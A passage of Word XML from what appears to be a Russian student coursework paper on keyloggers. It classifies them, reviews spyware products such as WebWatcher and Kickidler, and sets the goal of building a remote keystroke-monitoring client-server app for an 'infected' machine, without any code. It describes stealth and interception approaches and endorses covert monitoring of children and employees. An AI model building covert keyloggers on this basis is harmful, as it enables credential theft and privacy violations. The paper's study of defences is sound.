      <w:r w:rsidRPr="002B32F4">
        <w:t>Безопасность операционной системы – такое состояние операционной системы, при котором невозможно случайное или преднамеренное нарушение ее функционирования, а также нарушение безопасности находящихся под управлением системы ресурсов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5091" w:rsidRDefault="00AA5091" w:rsidP="00ED6F1F">
      <w:r>
        <w:t>Безопасность данных вычислительной системы обеспечивается средствами отказоустойчивости операционной</w:t>
      </w:r>
      <w:r w:rsidRPr="002B32F4">
        <w:t xml:space="preserve"> систем</w:t>
      </w:r>
      <w:r>
        <w:t>ы, направленными на защиту от сбоев и отказов аппаратуры и ошибок программного обеспечения, а также средствами защиты от несанкционированного доступа. В последнем случае операционная система защищает данные от ошибочного или злонамеренного поведения пользователей системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5091" w:rsidRDefault="006D4094" w:rsidP="006D4094">
      <w:r>
        <w:t xml:space="preserve">Конфиденциальные данные пользователей системы несут в себе материальный характер и являются целью злоумышленника. К таким данным относятся как личные данные пользователя, так и пароли от сетевых ресурсов, пароли </w:t>
      </w:r>
      <w:r w:rsidR="00463B17">
        <w:t>от интернета</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ресурсов и данные кредитных карт частных лиц. Последнее позволяет злоумышленнику списывать денежные средства со счетов пользователей скомпрометированных операционных систем.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA065D" w:rsidRDefault="00A3713D" w:rsidP="00ED6F1F">
      <w:r>
        <w:t>Один из способ</w:t>
      </w:r>
      <w:r w:rsidR="00A322A5">
        <w:t xml:space="preserve">ов </w:t>
      </w:r>
      <w:r w:rsidR="006D4094">
        <w:t>кражи конфиденциальных данных</w:t>
      </w:r>
      <w:r w:rsidR="00A322A5">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">это логирование его действий, в частности логирование нажатий на клавиатуру. </w:t>
      </w:r>
      <w:r w:rsidR="006D4094">
        <w:t>Подобную операцию можно проводить выборочно</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (в современных клавиатурных шпиона</w:t>
      </w:r>
      <w:r w:rsidR="006D4094">
        <w:t>х лог клавиатуры ассоциируется с программой в</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> которой производилась запись), </w:t>
      </w:r>
      <w:r w:rsidR="006D4094">
        <w:t>и массово (распространять вирус по всей сети Интернет)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF7DEC" w:rsidRDefault="00DF7DEC" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B32F4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Целью курсовой работы является</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A5615">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>анализ принципов работы программы клавиатурного шпиона, по</w:t>
      </w:r>
      <w:r w:rsidR="0079660F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>средством заражения клиентской</w:t>
      </w:r>
      <w:r w:rsidR="001A5615">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ЭВМ</w:t>
      </w:r>
      <w:r w:rsidR="000A2658" w:rsidRPr="000A2658">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF7DEC" w:rsidRDefault="00DF7DEC" w:rsidP="00ED6F1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Задач</w:t>
      </w:r>
      <w:r w:rsidR="00564871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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00564871" w:rsidRPr="002B32F4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>курсовой работы является</w:t>
      </w:r>
      <w:r w:rsidR="00564871">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B32F4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">разработка клиент-серверного приложения для </w:t>
      </w:r>
      <w:r w:rsidR="007F073E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">удаленного </w:t>
      </w:r>
      <w:r w:rsidRPr="002B32F4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мониторинга</w:t>
      </w:r>
      <w:r w:rsidR="00564871">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A3713D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">информации, вводимой с клавиатуры </w:t>
      </w:r>
      <w:r w:rsidR="00564871">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="002B32F4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> операционной систем</w:t>
      </w:r>
      <w:r w:rsidR="00564871">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidR="00A3713D" w:rsidRPr="00A3713D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A3713D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>клиентской ЭВМ</w:t>
      </w:r>
      <w:r w:rsidRPr="002B32F4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00022B90" w:rsidRDefault="00022B90" w:rsidP="00EB7617">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00564871" w:rsidRDefault="00564871" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="10"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc531885368"/>
      <w:bookmarkStart w:id="6" w:name="_Toc4724249"/>
      <w:r w:rsidRPr="00564871">
        <w:t>Исследовательская часть</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="006F3D4C" w:rsidRDefault="006F3D4C" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc4724250"/>
      <w:r w:rsidRPr="006F3D4C">
        <w:t>Постановка задачи</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00C20EA5" w:rsidRDefault="00D12E63" w:rsidP="00242D1A">
      <w:r w:rsidRPr="00D12E63">
        <w:t xml:space="preserve">Программы шпионы это в первую очередь </w:t>
      </w:r>
      <w:r w:rsidR="0079660F">
        <w:t>не средство совершения информационных преступлений</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12E63">
        <w:t xml:space="preserve">, а удобное средство обеспечения личной безопасности, во многих случаях необходимое </w:t>
      </w:r>
      <w:r w:rsidR="00BD6CFA">
        <w:t>легитимному пользователю</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12E63">
        <w:t>, особенно в тех условиях, когда к его компьютеру имеют доступ несколько человек.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D12E63" w:rsidRDefault="00D12E63" w:rsidP="00242D1A">
      <w:r w:rsidRPr="00D12E63">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Особенно поле</w:t>
      </w:r>
      <w:r w:rsidR="0079660F">
        <w:t>зны программы шпионы при наличии</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> детей, обеспечивающие</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12E63">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>тотальный контроль за информационной средой подростка во избежание последствий его действий</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12E63">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0079660F">
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12E63">
        <w:t>отрудники, активно использующие служебные терминалы в своих личных нуждах, нуждаются в надлежащем надзоре со стороны людей дисци</w:t>
      </w:r>
      <w:r>
        <w:t>плинированных и законопослушных</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12E63">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20EA5" w:rsidRDefault="0079660F" w:rsidP="00242D1A">
      <w:r>
        <w:t>К</w:t>
      </w:r>
      <w:r w:rsidR="007C4357">
        <w:t>лавиатурный шпион так же пользуется популярностью у злоумышленников для кражи конфиденциальных данных пользователей сети Интернет.</w:t>
      </w:r>
      <w:r w:rsidR="00C20EA5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1687" w:rsidRDefault="004E1687" w:rsidP="00242D1A">
      <w:r w:rsidRPr="004E1687">
        <w:t>Клавиатурные шпионы образуют большую категорию вредоносных программ, представляющую большую угрозу для безопасности пользователя. Как и Roo</w:t>
      </w:r>
      <w:r>
        <w:t>tkit</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1687">
        <w:t xml:space="preserve"> клавиатурные шпионы не являются вирусами, т.к. не обладают способностью к размножению.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1687" w:rsidRDefault="004E1687" w:rsidP="00242D1A">
      <w:r w:rsidRPr="004E1687">
        <w:t xml:space="preserve">Клавиатурный шпион не является вирусом, но, тем не менее, представляет большую угрозу для пользователей, поскольку позволяет злоумышленнику следить за работой пользователя и может применяться для похищения конфиденциальной информации, в том числе паролей пользователя. Опасность клавиатурного шпиона может существенно возрасти при его сочетании с RootKit-технологией, которая позволит замаскировать присутствие клавиатурного шпиона. Еще более опасной является троянская </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1687">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">или backdoor программа, содержащая клавиатурный шпион – его наличие существенно расширяет функции троянской программы и ее опасность для пользователя. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1687" w:rsidRDefault="004E1687" w:rsidP="004E1687">
      <w:r w:rsidRPr="004E1687">
        <w:t>К сожалению, в последнее время известны сотни разнообразных ке</w:t>
      </w:r>
      <w:r>
        <w:t>йлогг</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1687">
        <w:t xml:space="preserve">еров, причем многие из них не детектируются антивирусами. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00976170" w:rsidRDefault="004E1687" w:rsidP="00242D1A">
      <w:r>
        <w:t>В данной курсовой работе рассматриваются принципы работы клавиатурных шпионов, нацеленных на скрытную от пользователя работу и кражу пользовательских данных.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C770FF" w:rsidRDefault="00C770FF" w:rsidP="00242D1A">
      <w:r w:rsidRPr="00C770FF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Клавиатурный шпион</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00C770FF">
        <w:t>keylogger</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) – </w:t>
      </w:r>
      <w:r w:rsidRPr="00C770FF">
        <w:t xml:space="preserve">программное обеспечение или аппаратное устройство, регистрирующее различные действия пользователя — нажатия клавиш на клавиатуре компьютера, движения </w:t>
      </w:r>
      <w:r>
        <w:t>и нажатия клавиш мыши и т. д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C00B4" w:rsidRDefault="002C00B4" w:rsidP="00242D1A">
      <w:r w:rsidRPr="002C00B4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Классификация</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> клавиатурных шпионов, далее кейлоггеров:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C00B4" w:rsidRDefault="002C00B4" w:rsidP="002C00B4">
      <w:r w:rsidRPr="009A68D4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Программные</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> кейлоггеры принадлежат к той группе программных продуктов, которые осуществляют контроль над деятельностью пользователя персонального компьютера. Первоначально программные продукты этого типа предназначались исключительно для записи информации о нажатиях клавиш клавиатуры, в том числе и системных, в специализированный журнал регистрации (лог-файл), который впоследствии изучался человеком, установившим эту программу. Лог-файл мог отправляться по сети на сетевой диск, FTP-сервер в сети Интернет, по электронной почте и т. д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A68D4" w:rsidRDefault="002C00B4" w:rsidP="009A68D4">
      <w:r>
        <w:t>В настоящее время программные продукты, сохранившие «по старинке» данное название, выполняют много дополнительных функций — это перехват информации из окон, перехват кликов мыши, перехват буфера обмена, «фотографирование» снимков экрана и активных окон, ведение учёта всех полученных и отправленных e-mail, отслеживание файловой активности и работы с системным реестром, запись заданий, отправленных на принтер, перехват звука с микрофона и изображения с веб-камеры, подключенных к компьютеру и т. д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C00B4" w:rsidRDefault="002C00B4" w:rsidP="002C00B4">
      <w:r w:rsidRPr="009A68D4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Аппаратные</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> кейлоггеры представляют собой миниатюрные приспособления, которые могут быть прикреплены между клавиатурой и компьютером или встроены в саму клавиатуру. Они регистрируют все нажатия клавиш, сделанные на клавиатуре. Процесс регистрации абсолютно невидим для конечного пользователя. Аппаратные кейлоггеры не требуют установки какой-либо программы на компьютере, чтобы успешно перехватывать все нажатия клавиш. Когда аппаратный кейлоггер прикрепляется, абсолютно не имеет значения, в каком состоянии находится компьютер — включенном или выключенном. Время его работы не ограничено, так как он не требует для своей работы дополнительного источника питания.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C00B4" w:rsidRDefault="002C00B4" w:rsidP="002C00B4">
      <w:r>
        <w:t>Объёмы внутренней энергонезависимой памяти данных устройств позволяют записывать до 20 миллионов нажатий клавиш, причём с поддержкой юникода. Данные устройства могут быть выполнены в любом виде, так что даже специалист не в состоянии иногда определить их наличие при проведении аудита</w:t>
      </w:r>
      <w:r w:rsidR="0079660F">
        <w:t xml:space="preserve"> безопасности</w:t>
      </w:r>
      <w:r>
        <w:t>. В зависимости от места прикрепления аппаратные кейлоггеры подразделяются на внешние и внутренние.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C00B4" w:rsidRDefault="002C00B4" w:rsidP="002C00B4">
      <w:r w:rsidRPr="009A68D4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Акустические</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> кейлоггеры представляют собой аппаратные устройства, которые вначале записывают звуки, создаваемые пользователем при нажатии на клавиши клавиатуры компьютера, а затем анализирующие эти звуки и преобразовывающие их в текстовый формат</w:t>
      </w:r>
      <w:r w:rsidR="009A68D4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00463B17" w:rsidRDefault="009A68D4" w:rsidP="00BA20CE">
      <w:r>
        <w:t xml:space="preserve">Для взаимодействия с централизованным сервером удобно применять программный кейлоггер. Перехват нажатия клавиши клавиатуры может происходить разными способами. Самый низкоуровневый подход, способный перехватывать пароль ОС, это </w:t>
      </w:r>
      <w:r w:rsidR="005A49FF">
        <w:t>интегрирование</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вредоносного кода </w:t>
      </w:r>
      <w:r w:rsidR="005A49FF">
        <w:t>в</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> драйвер </w:t>
      </w:r>
      <w:r w:rsidR="00466899">
        <w:t>устройства,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с которого осуществляется перехват. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1D7D" w:rsidRDefault="004E1D7D" w:rsidP="002C00B4">
      <w:r>
        <w:t xml:space="preserve">Задача курсовой работы изучить поток сообщений </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1D7D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">принципы функционирования кейлогера построенного на применении функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinAPI</w:t>
      </w:r>
      <w:r w:rsidRPr="00B045B9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GetMessage</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1D7D">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Поиск путей защиты от подобных простейших кейлогеров.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA5816" w:rsidRDefault="00BA5816" w:rsidP="00EE55CD">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A5833" w:rsidRDefault="006F3D4C" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc4724251"/>
      <w:r w:rsidRPr="006F3D4C">
        <w:lastRenderedPageBreak/>
        <w:t>Поиск методов решения и аналогов</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00BA20CE" w:rsidRPr="00BA20CE" w:rsidRDefault="00BA20CE" w:rsidP="00BA20CE">
      <w:r w:rsidRPr="00E11940">
        <w:t xml:space="preserve">Самый доступный способ перехват функции </w:t>
      </w:r>
      <w:r w:rsidRPr="00E11940">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinAPI</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11940">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E11940">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GetMessage</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11940">
        <w:t xml:space="preserve"> в семействе операционных систем </w:t>
      </w:r>
      <w:r w:rsidRPr="00E11940">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11940">
        <w:t>. Данный способ подробно описан в пункте 2.1 данной курсовой работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C03E2" w:rsidRDefault="008C03E2" w:rsidP="00ED6F1F">
      <w:r>
        <w:t xml:space="preserve">Для решения поставленной задачи был произведен поиск и анализ существующих программных продуктов, обладающих функционалом </w:t>
      </w:r>
      <w:r w:rsidR="00011752">
        <w:t>клавиатурного шпиона</w:t>
      </w:r>
      <w:r w:rsidR="00AD6580">
        <w:t xml:space="preserve"> и позволяющих вести </w:t>
      </w:r>
      <w:r w:rsidR="00011752">
        <w:t xml:space="preserve">удаленный </w:t>
      </w:r>
      <w:r w:rsidR="00AD6580">
        <w:t xml:space="preserve">мониторинг </w:t>
      </w:r>
      <w:r w:rsidR="00011752">
        <w:t xml:space="preserve">учетных данных полученных с </w:t>
      </w:r>
      <w:r w:rsidR="00007435">
        <w:t xml:space="preserve">зараженных </w:t>
      </w:r>
      <w:r w:rsidR="00011752">
        <w:t>ЭВМ</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F2DB5" w:rsidRDefault="00007435" w:rsidP="00007435">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc4724252"/>
      <w:r w:rsidRPr="00007435">
        <w:t>Award Keylogger</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="002812CE" w:rsidRDefault="00007435" w:rsidP="00ED6F1F">
      <w:r w:rsidRPr="00007435">
        <w:t>Award Keylogger является достаточно популярной шпионской программой, которая описана на многих сайтах как мощный инструмент слежения в реальном режиме времени с богатой функциональностью. Но вс</w:t>
      </w:r>
      <w:r>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="00007435">
        <w:t xml:space="preserve"> перечисленн</w:t>
      </w:r>
      <w:r>
        <w:t>ая</w:t>
      </w:r>
      <w:r w:rsidRPr="00007435">
        <w:t xml:space="preserve"> функциональность</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в продукте не присутствует</w:t>
      </w:r>
      <w:r w:rsidRPr="00007435">
        <w:t>. Программа оказалась чуть лучше среднестатистического шпиона.</w:t>
      </w:r>
      <w:r w:rsidR="007F073E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E1687">
        <w:t>Интерфейс</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5091">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00007435">
        <w:t>Award Keylogger</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не заурядный </w:t>
      </w:r>
      <w:r w:rsidR="007F073E">
        <w:t>(Рисунок 1)</w:t>
      </w:r>
      <w:r w:rsidR="002812CE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002812CE" w:rsidRDefault="00007435" w:rsidP="00ED6F1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572125" cy="4330982"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Рисунок 3" descr="Award Keylo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ard Keylogg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11" cy="433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73E" w:rsidRDefault="007F073E" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5091">
        <w:t xml:space="preserve"> 1 – </w:t>
      </w:r>
      <w:r w:rsidR="004E1687">
        <w:t>Интерфейс</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5091">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00007435" w:rsidRPr="00007435">
        <w:t>Award Keylogger</w:t>
      </w:r>
      <w:r w:rsidR="00007435">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F2DB5" w:rsidRPr="00AA5091" w:rsidRDefault="00007435" w:rsidP="00007435">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc4724253"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00007435">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>WebWatcher</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="007F073E" w:rsidRDefault="00174275" w:rsidP="00ED6F1F">
      <w:r w:rsidRPr="00174275">
        <w:t>Эта шпионская программа, как и многие ей подобные, позиционирует себя как инструмент для родителей и менеджеров, который дает возможность контролировать детей и сотрудников. Такая позиция позволяет избежать попадание в сигнатурные базы антивирусов и работать незаметно на компьютерах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00174275" w:rsidRDefault="00174275" w:rsidP="00ED6F1F">
      <w:r w:rsidRPr="00174275">
        <w:t>WebWatcher работает очень скрытно. Его нет ни в процессах, ни в службах, и среди драйверов он отсутствует. Обычными средствами его сложно найти.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00174275">
        <w:t>WebWatcher представляет из себя шпионскую программу с богатой функциональностью и очень хорошо себя скрывающую.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D7BA5" w:rsidRDefault="00627EFB" w:rsidP="00ED6F1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7885" cy="447675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BA5" w:rsidRPr="00EF7464" w:rsidRDefault="008D7BA5" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Рисунок</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5091">
        <w:t xml:space="preserve"> 2 – </w:t>
      </w:r>
      <w:r>
        <w:t>Главное</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5091">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>окно</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5091">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00174275" w:rsidRPr="00007435">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WebWatcher</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA5816" w:rsidRPr="00CB45BC" w:rsidRDefault="00BA5816" w:rsidP="00BA5816">
      <w:r w:rsidRPr="00CB45BC">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F2DB5" w:rsidRPr="00AA5091" w:rsidRDefault="00174275" w:rsidP="00174275">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc4724254"/>
      <w:r w:rsidRPr="00174275">
        <w:lastRenderedPageBreak/>
        <w:t>Kickidler</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00174275" w:rsidRDefault="00174275" w:rsidP="00174275">
      <w:r w:rsidRPr="00174275">
        <w:t xml:space="preserve">Судя по количеству выдач в поисковых запросах, программа Kickidler еще не набрала популярности на просторах российского интернета. На сайте разработчиков программа представлена как средство для повышения эффективности бизнеса, поскольку позволяет найти подчиненных, занимающихся личными делами в рабочее время. </w:t>
      </w:r>
      <w:r>
        <w:t>На своем рынке является одним из самых функциональных и молодых продуктов. Разработан TeleLink Soft. Kickidler умеет собирать информацию о том, с какими программами и сайтами работал сотрудник и сколько времени у него заняла эта работа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00174275" w:rsidRDefault="00174275" w:rsidP="00174275">
      <w:r>
        <w:t>Для каждого человека или группы людей (менеджеры, программисты, бухгалтерия) существует свой список продуктивных и непродуктивных программ и сайтов. Например, Facebook для SMM менеджера рабочий инструмент, а для бухгалтера — развлечение. На основе этого деления Kickidler отображает отчет об эффективности отдельных сотрудников, подразделений и всей компании и табель учета рабочего времени.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00174275" w:rsidRDefault="00174275" w:rsidP="00174275">
      <w:r>
        <w:t>Кроме того, Kickidler позволяет вести видео трансляцию рабочего стола сотрудника, так же в н</w:t>
      </w:r>
      <w:r w:rsidR="0056715A">
        <w:t>его встроен кейлоггер (Рисунок 3</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00174275" w:rsidRDefault="00174275" w:rsidP="0017427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600700" cy="3257550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
